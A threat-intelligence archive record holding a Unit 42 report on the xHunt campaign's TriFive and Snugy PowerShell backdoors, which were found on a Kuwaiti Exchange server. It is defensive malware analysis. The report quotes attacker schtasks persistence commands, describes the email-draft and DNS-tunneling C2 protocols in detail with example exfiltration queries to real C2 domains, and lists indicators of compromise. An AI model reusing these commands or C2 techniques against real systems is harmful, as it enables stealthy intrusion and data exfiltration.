{
	"id": "6a20b968-43eb-4333-8b33-0ba898c4fb39",
	"created_at": "2026-04-06T00:14:28.28433Z",
	"updated_at": "2026-04-10T13:11:55.204413Z",
	"deleted_at": null,
	"sha1_hash": "c5a8e3fb44ccf31e384339649875ebd374504407",
	"title": "xHunt Campaign: Newly Discovered Backdoors Using Deleted Email Drafts and DNS Tunneling for Command and Control",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 391641,
	"plain_text": "xHunt Campaign: Newly Discovered Backdoors Using Deleted\r\nEmail Drafts and DNS Tunneling for Command and Control\r\nBy Robert Falcone\r\nPublished: 2020-11-09 · Archived: 2026-04-05 14:14:47 UTC\r\nExecutive Summary\r\nThe xHunt campaign has been active since at least July 2018 and we have seen this group target Kuwait\r\ngovernment and shipping and transportation organizations. Recently, we observed evidence that the threat actors\r\ncompromised a Microsoft Exchange Server at an organization in Kuwait. We do not have visibility into how the\r\nactors gained access to this Exchange server. However, based on the creation timestamps of scheduled tasks\r\nassociated with the breach, we believe the threat actors had gained access to the Exchange server on or before\r\nAug. 22, 2019. The activity we observed involved two backdoors – one of which we call TriFive and a variant of\r\nCASHY200 that we call Snugy – as well as a web shell that we call BumbleBee.\r\nThe TriFive and Snugy backdoors are PowerShell scripts that provide backdoor access to the compromised\r\nExchange server, using different command and control (C2) channels to communicate with the actors. The TriFive\r\nbackdoor uses an email-based channel that uses Exchange Web Services (EWS) to create drafts within the Deleted\r\nItems folder of a compromised email account. The Snugy backdoor uses a DNS tunneling channel to run\r\ncommands on the compromised server. We will provide an overview of these two backdoors since they differ from\r\ntools previously used in the campaign.\r\nWe will be providing an analysis of the activity associated with the BumbleBee web shell in an upcoming blog.\r\nThat activity provides a glimpse into the threat actor's tactics, techniques and procedures when interacting with\r\ncompromised servers.\r\nPalo Alto Networks customers are protected from the attacks outlined in this blog in a variety of ways. 
See the\r\nConclusion for more details.\r\nTriFive and Snugy Backdoors\r\nIn September 2020, we were notified that threat actors breached an organization in Kuwait. The organization's\r\nExchange server had suspicious commands being executed via the Internet Information Services (IIS) process\r\nw3wp.exe. Actors issued these commands via a web shell we call BumbleBee that had been installed on the\r\nExchange server, which we will discuss in detail in a future blog. We investigated how the actors installed the web\r\nshell on the system, and we did not find any evidence of exploitation of the Exchange server within the logs that\r\nwe were able to collect. However, we did discover two scheduled tasks created by the threat actor well before the\r\ndates of the collected logs, both of which would run malicious PowerShell scripts. We cannot confirm that the\r\nactors used either of these PowerShell scripts to install the web shell, but we believe the threat actors already had\r\naccess to the server prior to the logs.\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/\r\nPage 1 of 10\n\nThe actors created two tasks on the Exchange server named ResolutionHosts and ResolutionsHosts, both of which\r\nwere created within the c:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\WDI folder. This folder also stores a\r\nlegitimate ResolutionHost task by default on Windows systems, as seen in Figure 1. The legitimate\r\nResolutionHost task is associated with the Windows Diagnostic Infrastructure (WDI) Resolution host that is used\r\nto provide interactive troubleshooting for problems that arise on the system. We believe that the actor chose these\r\ntask names specifically to blend in and appear to be part of the legitimate WDI.\r\nFigure 1. Legitimate ResolutionHost Task associated with the Windows Diagnostic Infrastructure Resolution host.\r\nThe tasks running the backdoors appear to imitate this task.\r\nOn Aug. 28 and Oct. 
22, 2019, the actors created the ResolutionHosts and ResolutionsHosts tasks to run two\r\nseparate PowerShell-based backdoors. The actors used these two scheduled tasks as a persistence method, as they\r\nran the two PowerShell scripts repeatedly, albeit at different intervals. Table 1 shows the two tasks and their\r\nassociated creation times, run intervals and the command executed. The commands executed by the two tasks\r\nattempt to run splwow64.ps1 and OfficeIntegrator.ps1, which are backdoors that we call TriFive and a variant of\r\nCASHY200 that we call Snugy, respectively. The scripts were stored in two separate folders on the system, which\r\nis likely an attempt to avoid both backdoors being discovered and removed.\r\nTask Created Time Run Interval Command\r\nResolutionHosts 2019-08-28T20:01:34 30 minutes powershell -exec bypass -file C:\\Users\\Public\\Libraries\\OfficeIntegrator.ps1\r\nResolutionsHosts 2019-10-22T15:02:39 5 minutes powershell -exec bypass -file c:\\windows\\splwow64.ps1\r\nTable 1. Scheduled tasks used to persistently run malicious PowerShell-based backdoors.\r\nThe table also shows that the two backdoors were executed at different intervals, with the TriFive backdoor running\r\nevery five minutes and the Snugy backdoor running every 30 minutes. We cannot confirm the exact reason behind\r\nthe difference in intervals, but it may have to do with the stealthiness of the C2 channel associated with the\r\nbackdoor. For instance, Snugy may have a longer interval than TriFive as it uses DNS tunneling as a C2 channel,\r\nwhich is a more well-known C2 channel with a higher likelihood of detection compared to the previously\r\nunknown email-based C2 channel used by TriFive.\r\nWe were not able to confirm how the actors created the ResolutionHosts and ResolutionsHosts tasks. 
However, we\r\nare aware of the actors using batch scripts to create scheduled tasks named SystemDataProvider and CacheTask- when installing Snugy samples on other systems. For instance, the following batch script creates and runs a\r\nscheduled task named SystemDataProvider to run the Snugy sample named xpsrchvw.ps1:\r\nschtasks /create /sc MINUTE /mo 5 /tn \"\\Microsoft\\Windows\\SideShow\\SystemDataProvider\" /tr \"powershell -exec bypass -file C:\\Windows\\Temp\\xpsrchvw.ps1\" /ru SYSTEM \u0026 schtasks /run /tn \"\\Microsoft\\Windows\\SideShow\\SystemDataProvider\"\r\nTriFive Backdoor\r\nTriFive is a previously unseen PowerShell-based backdoor that the xHunt actors installed on the compromised\r\nExchange server, executing every five minutes via a scheduled task. TriFive provided backdoor access to the\r\nExchange server by logging into a legitimate user's inbox and obtaining a PowerShell script from an email draft\r\nwithin the deleted emails folder. The TriFive sample used a legitimate account name and credentials from the\r\ntargeted organization. This suggests that the threat actor had stolen the account's credentials prior to the\r\ninstallation of the TriFive backdoor.\r\nThe use of email drafts and a shared email account between the Trojan and actor to facilitate C2 communications\r\nis not a new technique for the actors associated with xHunt. In fact, this same general technique was used by the\r\nemail-based C2 in the Hisoka tool discussed in the initial publication about the xHunt campaign in September\r\n2019. While the Hisoka tool used email drafts to send and receive data, these drafts remained in the Drafts folder,\r\nwhereas the TriFive backdoor specifically saves its email drafts to the Deleted Items folder instead.\r\nTo issue commands to the backdoor, the actor would log into the same legitimate email account and create an\r\nemail draft with a subject of 555, including the command in encrypted and base64 encoded format. 
Figure 2\r\nshows an example command email with a subject of 555 and a message body of woFyeWt3cw==, which decodes\r\nand decrypts to whoami. The script would execute this via PowerShell.\r\nFigure 2. Email draft in Deleted Items folder issuing command to TriFive backdoor.\r\nTo run the commands supplied by the actor, the PowerShell script logs into a legitimate email account on the\r\nExchange server and checks the Deleted Items folder for emails with a subject of 555. The script opens the email\r\ndraft, base64 decodes the contents in the message body of the email and decrypts the decoded contents by\r\nsubtracting 10 from each character. The script then runs the resulting cleartext using PowerShell's built-in Invoke-Expression (iex) cmdlet. After executing the provided PowerShell code, the script will encrypt the results by\r\nadding 10 to each character and base64 encoding the ciphertext. TriFive will then send the command results to the\r\nactor by setting the encoded ciphertext as the message body of an email draft that it will save in the Deleted Items\r\nfolder with the subject of 555 s. Figure 3 shows an example email draft in the Deleted Items folder created by the\r\nTriFive script to transmit the results of the command issued, which has a subject of 555 s and a message body of\r\nbQB5AHgAfgB5AH0AeQBmAGsAbgB3AHMAeABzAH0AfgB8AGsAfgB5AHwA, which decodes and\r\ndecrypts to contoso\\administrator.\r\nFigure 3. Email draft in Deleted Items folder created by TriFive backdoor to send results to C2.\r\nThe TriFive PowerShell script does not have any loops to continually run on a system. 
Instead, TriFive relies on\r\nthe previously mentioned ResolutionsHosts scheduled task for persistence.\r\nSnugy Backdoor\r\nThe OfficeIntegrator.ps1 file seen in the ResolutionHosts task is a PowerShell-based backdoor we call Snugy,\r\nwhich allows an actor to obtain the system's hostname and to run commands. Snugy is a variant of the\r\nCASHY200 backdoor used by actors in previous attacks in the xHunt campaign. In July 2019, Trend Micro\r\ncreated a detection signature for this backdoor called Backdoor.PS1.NETERO.A, which suggests that this\r\nparticular variant of CASHY200 has been around for over a year. We are calling this variant of the backdoor\r\nSnugy, as Netero is already a name of a variant of the Hisoka tool used by the xHunt actors.\r\nWe observed the following code overlaps between this Snugy tool and CASHY200:\r\n1. Function used to convert strings to hexadecimal representation.\r\n2. Function used to generate a string of random upper and lowercase characters.\r\n3. Regular expression to extract resolved IP address from either the ping or nslookup command, depending on\r\nthe sample.\r\n4. Command handler uses the first octet of IP address to determine the command to run.\r\n5. Command handler has the same two commands available: get hostname and run command.\r\nMuch like CASHY200, Snugy uses DNS tunneling to communicate with its C2 server, specifically by issuing\r\nDNS A record lookups to resolve custom crafted subdomains of actor-controlled C2 domains. However, the\r\nstructure of the custom crafted domains differs dramatically from previous CASHY200 samples due to the\r\nfollowing:\r\n1. Variable values for important fields in the subdomain.\r\n2. Randomly chosen order of the fields in the data section.\r\n3. Randomly chosen C2 domains for each outbound query.\r\n4. 
Can only transmit one byte of data per query instead of 11.\r\nThe differences in the subdomains and amount of data that each query can transmit are the main reason we gave\r\nthis particular sample its own variant name. The Snugy sample was configured to choose one of the following\r\ndomains at random as its C2 domain:\r\nhotsoft[.]icu\r\nuplearn[.]top\r\nlidarcc[.]icu\r\ndeman1[.]icu\r\nLike early variants of CASHY200, the Snugy variant uses the following command to ping a custom crafted\r\ndomain, which ultimately attempts to resolve the domain before sending the ICMP requests to the resolving IP\r\naddress:\r\ncmd /c ping -n 1 \u003ccustom crafted sub-domain\u003e.\u003cC2 domain\u003e\r\nSnugy will extract the IP address that the ping application resolved using the following regular expression to\r\ngather the IP address from the ping results:\r\n\\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\b\r\nThis regular expression is publicly available on many sites as a way to extract or validate IP addresses. However,\r\nwe saw this same regular expression in the CASHY200 tool used in previous xHunt attacks. Snugy also has the\r\nsame command set available as CASHY200 and uses the first octet to determine the command the actor wishes to\r\nrun. Table 2 shows the two numbers that will either send the hostname of the system to the C2 or run a command.\r\nThe first octets of 86 and 102 differ from CASHY200's 48 and 92, but both backdoors use the second octet to\r\ndetermine how many DNS queries the backdoor needs to issue to download the command from the C2.\r\nIP address Description\r\n86.x.x.x Runs hostname command and sends results to C2\r\n102.\u003c# of queries\u003e.x.x Run command via cmd /c and send results to C2\r\nTable 2. 
Snugy backdoor command handler.\r\nThe subdomains created by Snugy include a communication type field, a field specifying the order of elements in\r\nthe data section, and lastly the data section, as seen in the following C2 domain structure:\r\n\u003ccharacter for communication type\u003e\u003ccharacter for order of fields in data section\u003e\u003cdata section\u003e.\u003cC2 domain\u003e\r\nAs previously mentioned, the structure of the subdomain differs dramatically from previous variants. Not only\r\ndoes it introduce multiple possible values for each communication type, but it also includes a random order of\r\nfields in the data section of the subdomain as well. The first character in the subdomain generated by Snugy is the\r\ncommunication type, which tells the C2 server the purpose of the inbound DNS query. Table 3 shows the possible\r\ncharacters for each communication type that Snugy will choose at random when constructing the subdomain, as\r\nwell as the purpose of each type.\r\nComm Type Description\r\n'q','b','e','d' or 'm' Initial Beacon\r\n'z','j','r','p' or 'x' Sending the hostname as data to the C2 server\r\n's','n','u','g' or 'y' Requesting a chunk of data from C2 server\r\n'c','f','v','h' or 'k' Sending the results of command execution as data to the C2 server\r\n'i','t','o','l' or 'w' Notification of the end of the data transmission\r\nTable 3. Communication types and their purpose in Snugy's DNS tunneling protocol.\r\nThe second character in the subdomain generated by Snugy tells the C2 server the order of the fields in the\r\nsubsequent data section of the subdomain. The data section of the subdomain contains the following three fields\r\nand their corresponding 0, 1 or 2 index used by Snugy to specify the order of the fields:\r\n0. 4 hexadecimal characters representing a 2-byte campaign code\r\n1. 2 random characters\r\n2. 
2 hexadecimal characters representing one byte of data, followed by a sequence number between 1 and 9\r\nSnugy uses the 0, 1 and 2 index to order the fields in the data section and includes the order character so the C2\r\nunderstands how to parse inbound queries. Table 4 shows the order of data fields and the corresponding character\r\nused to represent the order. It should be noted that the data section is blank in the initial beacon communication\r\ntype.\r\nIndex Order Character Structure of data field\r\n012 t \u003ccampaign code\u003e\u003crandom characters\u003e\u003cdata and sequence number\u003e\r\n021 m \u003ccampaign code\u003e\u003cdata and sequence number\u003e\u003crandom characters\u003e\r\n102 d \u003crandom characters\u003e\u003ccampaign code\u003e\u003cdata and sequence number\u003e\r\n120 h \u003crandom characters\u003e\u003cdata and sequence number\u003e\u003ccampaign code\u003e\r\n201 p \u003cdata and sequence number\u003e\u003ccampaign code\u003e\u003crandom characters\u003e\r\n210 z \u003cdata and sequence number\u003e\u003crandom characters\u003e\u003ccampaign code\u003e\r\nTable 4. Order of data fields and the corresponding character used in Snugy's DNS tunneling protocol.\r\nThe Snugy DNS tunneling protocol can only send one byte of data per query, making it quite inefficient at\r\nexfiltrating data, but the use of DNS A record queries suggests that the DNS tunneling protocol can receive four\r\nbytes of data per DNS query. For instance, if the C2 server resolves the beacon query to an IP address that has\r\n“86” as its first octet, Snugy will issue 12 queries to transmit the host name “WIN-DESKTOP” to the C2\r\nserver. 
Table 5 shows these 12 queries with each subdomain parsed as the C2 would upon receipt of the query.\r\nThis table highlights the inefficiency of this DNS tunneling protocol for data exfiltration.\r\nDomain Parsed domain – Comm Type,Order,Data Ordered\r\njp5717266vd.lidarcc.icu j (hostname) p (201) 57 ('W' data) 1 (seq) 7266 ('rf') vd (rand)\r\njhxv4927266.hotsoft.icu j (hostname) h (120) xv (rand) 49 ('I' data) 2 (seq) 7266 ('rf')\r\njp4e37266iB.hotsoft.icu j (hostname) p (201) 4e ('N' data) 3 (seq) 7266 ('rf') iB (rand)\r\njz2d4gs7266.deman1.icu j (hostname) z (210) 2d ('-' data) 4 (seq) gs (rand) 7266 ('rf')\r\njp4457266xr.hotsoft.icu j (hostname) p (201) 44 ('D' data) 5 (seq) 7266 ('rf') xr (rand)\r\njm7266456Va.hotsoft.icu j (hostname) m (021) 7266 ('rf') 45 ('E' data) 6 (seq) Va (rand)\r\njhNK5377266.uplearn.top j (hostname) h (120) NK (rand) 53 ('S' data) 7 (seq) 7266 ('rf')\r\njt7266CF4b8.lidarcc.icu j (hostname) t (012) 7266 ('rf') CF (rand) 4b ('K' data) 8 (seq)\r\njp5497266qV.uplearn.top j (hostname) p (201) 54 ('T' data) 9 (seq) 7266 ('rf') qV (rand)\r\njt7266iW4f1.lidarcc.icu j (hostname) t (012) 7266 ('rf') iW (rand) 4f ('O' data) 1 (seq)\r\njm7266502HA.lidarcc.icu j (hostname) m (021) 7266 ('rf') 50 ('P' data) 2 (seq) HA (rand)\r\not7266Ng502.hotsoft.icu o (done) t (012) 7266 ('rf') Ng (rand) 50 ('P' data) 2 (seq)\r\nTable 5. Example queries of Snugy sending the hostname over DNS tunneling protocol.\r\nWe did observe the threat actors using the Snugy tool to run commands and exfiltrate the results, as we were able\r\nto obtain the domains queried via ping requests sent from the compromised server. Based on the exfiltrated data\r\nfrom within the subdomains, we were able to determine the actors ran ipconfig /all and dir. 
Unfortunately, we only\r\nhad a subset of the requests so the data exfiltrated was truncated, which also suggests that the actors likely ran\r\nother commands that we did not observe.\r\nWe found a second Snugy sample on another server at the same Kuwaiti organization with a name of SyncRes.ps1\r\nand a SHA256 hash of a4a0ec94dd681c030d66e879ff475ca76668acc46545bbaff49b20e17683f99c. The actor\r\ninstalled this Snugy sample by saving this PowerShell script to C:\\Windows\\System32\\bg-BG and by creating a\r\nscheduled task named ResolutionHosts within the c:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\RAC folder\r\nto run the PowerShell script every 20 minutes. This particular Snugy sample only uses one root domain for C2,\r\nspecifically sharepoint-web[.]com, and uses a different structure for its custom crafted subdomains for its DNS\r\ntunnel:\r\n\u003ccharacter for communication type\u003e\u003ctwo random digits\u003e46\u003c3-bytes hexlified data section\u003e.\u003cC2 domain\u003e\r\nThis Snugy sample uses a single character from a hardcoded character set at the beginning of the subdomain to\r\nsignify the communication type. The character sets used for the communication type are the same as the\r\npreviously discussed OfficeIntegrator.ps1 variant, but with the exception of the 's','n','u','g','y' set (\"snugy\"), the character sets signify\r\ndifferent communication types, as seen in Table 6. Table 6 also shows that this sample only has three\r\ncommunication types. The sample does not include the hostname command. Rather, it can only run commands if\r\nthe C2 answers the beacon query with an IP address with 199 as the first octet.\r\nComm Type Description\r\n'i','t','o','l' or 'w' Initial Beacon\r\n's','n','u','g' or 'y' Requesting a chunk of data from C2 server\r\n'q','b','e','d' or 'm' Sending the results of command execution as data to the C2 server\r\nTable 6. 
Communication types and their purpose in the DNS tunneling protocol found in the second Snugy sample.\r\nInfrastructure Links to xHunt\r\nThe infrastructure associated with the activity outlined in this blog involves the five domains that Snugy\r\ncommunicated with as its C2 using DNS tunneling, specifically hotsoft[.]icu, uplearn[.]top,\r\nlidarcc[.]icu, deman1[.]icu and sharepoint-web[.]com. While there was not a lot of overlap with other\r\ninfrastructure, the domain ns1.alforatsystem[.]com resolved to the same IP address as several of the ns1 and ns2\r\nsubdomains on the Snugy C2 domains in May 2019, as seen in Table 7.\r\nDomain Passive DNS First seen\r\nns1.hotsoft[.]icu 198.98.48[.]181 05/06/2019 10:48:37 AM\r\nns2.hotsoft[.]icu 198.98.48[.]181 05/06/2019 10:48:37 AM\r\nns1.uplearn[.]top 198.98.48[.]181 05/11/2019 11:42:40 AM\r\nns2.uplearn[.]top 198.98.48[.]181 05/11/2019 11:42:40 AM\r\nns1.lidarcc[.]icu 198.98.48[.]181 05/08/2019 12:53:29 PM\r\nns2.lidarcc[.]icu 198.98.48[.]181 05/08/2019 12:53:29 PM\r\nns1.deman1[.]icu 198.98.48[.]181 05/08/2019 10:30:24 AM\r\nns2.deman1[.]icu 198.98.48[.]181 05/08/2019 10:30:24 AM\r\nns1.alforatsystem[.]com 198.98.48[.]181 05/05/2019 8:41:38 AM\r\nns2.alforatsystem[.]com 198.98.48[.]181 05/05/2019 8:41:38 AM\r\nTable 7. Infrastructure overlap between Snugy C2 domains and a domain previously used in xHunt.\r\nActors used the alforatsystem[.]com domain to host ZIP archives that they used to deliver LNK shortcut files to\r\ninstall backdoors in previous attacks during the xHunt campaign. 
The alforatsystem[.]com domain also has\r\nsignificant infrastructure overlap with other domains associated with xHunt as discussed in our previous\r\npublications, such as firewallsupports[.]com and pasta58[.]com, among others.\r\nIndicators of Compromise\r\nTriFive Samples\r\n407e5fe4f6977dd27bc0050b2ee8f04b398e9bd28edd9d4604b782a945f8120f\r\nSnugy Samples\r\nc18985a949cada3b41919c2da274e0ffa6e2c8c9fb45bade55c1e3b6ee9e1393\r\n6c13084f213416089beec7d49f0ef40fea3d28207047385dda4599517b56e127\r\nefaa5a87afbb18fc63dbf4527ca34b6d376f14414aa1e7eb962485c45bf38372\r\na4a0ec94dd681c030d66e879ff475ca76668acc46545bbaff49b20e17683f99c\r\nSnugy C2 Domains\r\ndeman1[.]icu\r\nhotsoft[.]icu\r\nuplearn[.]top\r\nlidarcc[.]icu\r\nsharepoint-web[.]com\r\nScheduled Task Names\r\nResolutionHosts\r\nResolutionsHosts\r\nSystemDataProvider\r\nCacheTask-\r\nSource: https://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/"
	],
	"report_names": [
		"xhunt-campaign-backdoors"
	],
	"threat_actors": [
		{
			"id": "20bc5b83-9ea0-4e60-a23e-19bf203dc9fb",
			"created_at": "2022-10-25T16:07:24.432777Z",
			"updated_at": "2026-04-10T02:00:04.986077Z",
			"deleted_at": null,
			"main_name": "xHunt",
			"aliases": [
				"Cobalt Katana",
				"Hive0081",
				"Hunter Serpens",
				"SectorD01"
			],
			"source_name": "ETDA:xHunt",
			"tools": [
				"CASHY200",
				"COLDTRAIN",
				"Gon",
				"Hisoka",
				"Killua",
				"Netero",
				"SHELLSTING",
				"Sakabota",
				"Snugy",
				"TriFive"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c5a103eb-08af-410b-b11d-3635f4d4a3eb",
			"created_at": "2025-08-07T02:03:24.756187Z",
			"updated_at": "2026-04-10T02:00:03.667108Z",
			"deleted_at": null,
			"main_name": "COBALT KATANA",
			"aliases": [
				"Hive0081 ",
				"SectorD01 ",
				"xHunt campaign "
			],
			"source_name": "Secureworks:COBALT KATANA",
			"tools": [
				"CASHY200",
				"Diezen",
				"Eye",
				"Gon",
				"Hisoka",
				"Hisoka Netero",
				"HyphenShell",
				"Killua",
				"Sakabota",
				"Sakabota Framework"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434468,
	"ts_updated_at": 1775826715,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c5a8e3fb44ccf31e384339649875ebd374504407.pdf",
		"text": "https://archive.orkl.eu/c5a8e3fb44ccf31e384339649875ebd374504407.txt",
		"img": "https://archive.orkl.eu/c5a8e3fb44ccf31e384339649875ebd374504407.jpg"
	}
}